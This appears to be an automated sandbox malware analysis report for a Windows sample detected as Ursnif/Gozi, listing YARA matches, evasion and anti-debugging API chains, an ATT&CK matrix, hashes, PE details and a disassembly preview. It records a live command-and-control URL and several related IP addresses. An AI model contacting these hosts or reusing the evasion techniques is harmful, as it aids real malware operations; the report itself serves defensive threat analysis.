      Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.580571515.00000000004D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005E16DF0_2_005E16DF
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005E832C0_2_005E832C
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005E1D8A0_2_005E1D8A
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,0_2_0040110B
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_00401459 NtMapViewOfSection,0_2_00401459
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005E421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_005E421F
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005E8551 NtQueryVirtualMemory,0_2_005E8551
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005C1C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_005C1C58
      Source: server_(3).exeReversingLabs: Detection: 38%
      Source: server_(3).exeVirustotal: Detection: 37%
      Source: server_(3).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\server_(3).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\server_(3).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/1
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005E30D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_005E30D5
      Source: C:\Users\user\Desktop\server_(3).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server_(3).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server_(3).exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\server_(3).exeUnpacked PE file: 0.2.server_(3).exe.400000.0.unpack
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\server_(3).exeUnpacked PE file: 0.2.server_(3).exe.400000.0.unpack .text:ER;.data:W;.wuke:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005E831B push ecx; ret 0_2_005E832B
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005E7F30 push ecx; ret 0_2_005E7F39
      Source: server_(3).exeStatic PE information: section name: .wuke
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

      Hooking and other Techniques for Hiding and Protection

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server_(3).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\server_(3).exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Found evasive API chain (may stop execution after checking system information)
      Source: C:\Users\user\Desktop\server_(3).exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
      Source: C:\Users\user\Desktop\server_(3).exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
      Source: C:\Users\user\Desktop\server_(3).exeAPI call chain: ExitProcess graph end node

      Anti Debugging

      barindex
      Found API chain indicative of debugger detection
      Source: C:\Users\user\Desktop\server_(3).exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005C092B mov eax, dword ptr fs:[00000030h]0_2_005C092B
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005C0D90 mov eax, dword ptr fs:[00000030h]0_2_005C0D90
      Source: C:\Users\user\Desktop\server_(3).exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\server_(3).exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_005C1C58
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005E3BD3 cpuid 0_2_005E3BD3
      Source: C:\Users\user\Desktop\server_(3).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_004015B0
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401D68
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005E3BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_005E3BD3

      Stealing of Sensitive Information

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Windows Management Instrumentation      		Path InterceptionPath Interception1
      Virtualization/Sandbox Evasion      		OS Credential Dumping1
      System Time Discovery      		Remote Services11
      Archive Collected Data      		Exfiltration Over Other Network Medium2
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      Data Encrypted for Impact
      Default Accounts12
      Native API      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Obfuscated Files or Information      		LSASS Memory1
      Security Software Discovery      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
      Software Packing      		Security Account Manager1
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
      Process Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer12
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      Account Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
      System Owner/User Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      Remote System Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
      System Information Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      server_(3).exe38%ReversingLabsWin32.Ransomware.LockbitCrypt
      server_(3).exe38%VirustotalBrowse
      server_(3).exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      0.2.server_(3).exe.5e0000.2.unpack100%AviraHEUR/AGEN.1245293Download File
      0.2.server_(3).exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://62.173.142.81/drew/l9wdesHCBL/WcUH_2Fe6cEC19JMx/ojSec9BNMFM6/V8tDDFde77O/U9i1cqxDkO368R/9gNBIEzgy6mBOfdpOkxLi/yTSQzU5LkHeJ3ST8/wg2AtPFgVdoBaEt/6J4T7kNNoupXFHQTJc/6wx_2FfTi/ip9uaIqtLaRaENmKe5lk/gWcrKu3HuxIt5fBBNoX/csBNoK1ie3PBW5Bt5sLiYK/wkK58GrNqzGj0/jf15aQpx/17gepP_2BoXbW_2FEP_2BQC/qQ5KGV_2Fv/ErJyFWv8XjZRosjau/Q6z6usxdqA4/_2FeDY.jlk0%Avira URL Cloudsafe
      http://62.1730%Avira URL Cloudsafe
      http://62.1730%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      checklist.skype.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://62.173.142.81/drew/l9wdesHCBL/WcUH_2Fe6cEC19JMx/ojSec9BNMFM6/V8tDDFde77O/U9i1cqxDkO368R/9gNBIEzgy6mBOfdpOkxLi/yTSQzU5LkHeJ3ST8/wg2AtPFgVdoBaEt/6J4T7kNNoupXFHQTJc/6wx_2FfTi/ip9uaIqtLaRaENmKe5lk/gWcrKu3HuxIt5fBBNoX/csBNoK1ie3PBW5Bt5sLiYK/wkK58GrNqzGj0/jf15aQpx/17gepP_2BoXbW_2FEP_2BQC/qQ5KGV_2Fv/ErJyFWv8XjZRosjau/Q6z6usxdqA4/_2FeDY.jlktrue
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://62.173server_(3).exe, 00000000.00000002.580737497.000000000238C000.00000004.00000010.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		low

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        62.173.142.81
        		unknownRussian Federation
        		34300SPACENET-ASInternetServiceProviderRUtrue

        General Information

        Joe Sandbox Version:37.0.0 Beryl
        Analysis ID:830450
        Start date and time:2023-03-20 11:45:24 +01:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 33s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample file name:server_(3).exe
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@1/0@1/1
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 71.9% (good quality ratio 69.9%)
        • Quality average: 82%
        • Quality standard deviation: 26.5%
        HCA Information:
        • Successful, ratio: 98%
        • Number of executed functions: 42
        • Number of non-executed functions: 40
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        SPACENET-ASInternetServiceProviderRUgozi_loader.bin.exeGet hashmaliciousUrsnifBrowse
        • 62.173.141.252
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.142.51
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.142.51
        KOYCdGz80D.exeGet hashmaliciousUrsnifBrowse
        • 62.173.142.51
        server.exeGet hashmaliciousUrsnif, CryptOneBrowse
        • 62.173.142.51
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.142.51
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.142.51
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.142.51
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.140.236
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.140.236
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.140.236
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.141.36
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.141.36
        lQj2udnlAj.exeGet hashmaliciousUrsnifBrowse
        • 62.173.141.36
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.141.36
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.138.6
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.138.6
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.138.6
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.140.103
        server.exeGet hashmaliciousUrsnifBrowse
        • 62.173.140.103

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        No created / dropped files found

        Static File Info

        General

        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):6.797824417239488
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:server_(3).exe
        File size:181760
        MD5:aa37b36ea7ba39b6c00ae1b01bada3f7
        SHA1:90545746e5b23fcdf7db1fa5c30588df2f4c31bf
        SHA256:a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7
        SHA512:1a3d446ab096e25b840c442356169333e10db16baa24d9f5842eddad4b8303dba3957310e1ba8545ebbb5379b7b1f84c3ca2957d3d29cd8ea85f014a9abe0772
        SSDEEP:3072:sKUXgTGIAmez+JQAxHun7YB5ahAWlS5UQjV:0gTfBfxAkBSAP5
        TLSH:C7049EC35390BC51E4158A3A8E2FC2F4AB4DFC51CE58AB66F3086E2F4CBC162D5A6751
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.Q.f.Q.f.Q...Q.f.Q..4Q.f.Q...Q.f.Q..9Q.f.Q.f.Q.f.Q...Q.f.Q..0Q.f.Q..7Q.f.QRich.f.Q........PE..L.....eb...................

        File Icon

        Icon Hash:ba824246a5a2a29a

        Static PE Info

        General

        Entrypoint:0x402f11
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
        Time Stamp:0x626505B2 [Sun Apr 24 08:09:22 2022 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:5
        OS Version Minor:1
        File Version Major:5
        File Version Minor:1
        Subsystem Version Major:5
        Subsystem Version Minor:1
        Import Hash:0c16d61a145a6038e0c4acd3e1db8764

        Entrypoint Preview

        Instruction
        call 00007F62A4AE81C0h
        jmp 00007F62A4AE57EEh
        mov eax, 0040D008h
        ret
        mov eax, dword ptr [0049D720h]
        push esi
        push 00000014h
        pop esi
        test eax, eax
        jne 00007F62A4AE5969h
        mov eax, 00000200h
        jmp 00007F62A4AE5968h
        cmp eax, esi
        jnl 00007F62A4AE5969h
        mov eax, esi
        mov dword ptr [0049D720h], eax
        push 00000004h
        push eax
        call 00007F62A4AE826Eh
        pop ecx
        pop ecx
        mov dword ptr [0049C700h], eax
        test eax, eax
        jne 00007F62A4AE5980h
        push 00000004h
        push esi
        mov dword ptr [0049D720h], esi
        call 00007F62A4AE8255h
        pop ecx
        pop ecx
        mov dword ptr [0049C700h], eax
        test eax, eax
        jne 00007F62A4AE5967h
        push 0000001Ah
        pop eax
        pop esi
        ret
        xor edx, edx
        mov ecx, 0040D008h
        jmp 00007F62A4AE5967h
        mov eax, dword ptr [0049C700h]
        mov dword ptr [edx+eax], ecx
        add ecx, 20h
        add edx, 04h
        cmp ecx, 0040D288h
        jl 00007F62A4AE594Ch
        push FFFFFFFEh
        pop esi
        xor edx, edx
        mov ecx, 0040D018h
        push edi
        mov eax, edx
        sar eax, 05h
        mov eax, dword ptr [0049C600h+eax*4]
        mov edi, edx
        and edi, 1Fh
        shl edi, 06h
        mov eax, dword ptr [edi+eax]
        cmp eax, FFFFFFFFh
        je 00007F62A4AE596Ah
        cmp eax, esi
        je 00007F62A4AE5966h
        test eax, eax
        jne 00007F62A4AE5964h
        mov dword ptr [ecx], esi
        add ecx, 20h
        inc edx
        cmp ecx, 0040D078h
        jl 00007F62A4AE5930h
        pop edi
        xor eax, eax
        pop esi
        ret
        call 00007F62A4AE5F76h
        cmp byte ptr [00000000h], 00000000h

        Rich Headers

        Programming Language:
        • [C++] VS2010 build 30319
        • [ASM] VS2010 build 30319
        • [ C ] VS2010 build 30319
        • [IMP] VS2008 SP1 build 30729
        • [RES] VS2010 build 30319
        • [LNK] VS2010 build 30319

        Data Directories

        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0xb7fc0x3c.text
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x9f0000xdaf0.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ae80x40.text
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x10000x19c.text
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

        Sections

        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000xb1440xb200False0.513232970505618data6.0109927875042635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .data0xd0000x9072c0x13200False0.946142258986928data7.852935841663951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .wuke0x9e0000x960x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rsrc0x9f0000xdaf00xdc00False0.4132634943181818data4.473611819780319IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

        Resources

        NameRVASizeTypeLanguageCountry
        AFX_DIALOG_LAYOUT0xab5980x2data
        TONIZITOHOWAPEVUMOBEM0xaaea00x598ASCII text, with very long lines (1432), with no line terminatorsSami LappishFinland
        TONIZITOHOWAPEVUMOBEM0xaaea00x598ASCII text, with very long lines (1432), with no line terminatorsSami LappishNorway
        TONIZITOHOWAPEVUMOBEM0xaaea00x598ASCII text, with very long lines (1432), with no line terminatorsSami LappishSweden
        RT_CURSOR0xab5a00x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
        RT_CURSOR0xab6d00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0
        RT_CURSOR0xab7c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
        RT_ICON0x9f6800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
        RT_ICON0x9f6800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
        RT_ICON0x9f6800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
        RT_ICON0x9ff280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
        RT_ICON0x9ff280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
        RT_ICON0x9ff280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
        RT_ICON0xa0ff80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
        RT_ICON0xa0ff80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
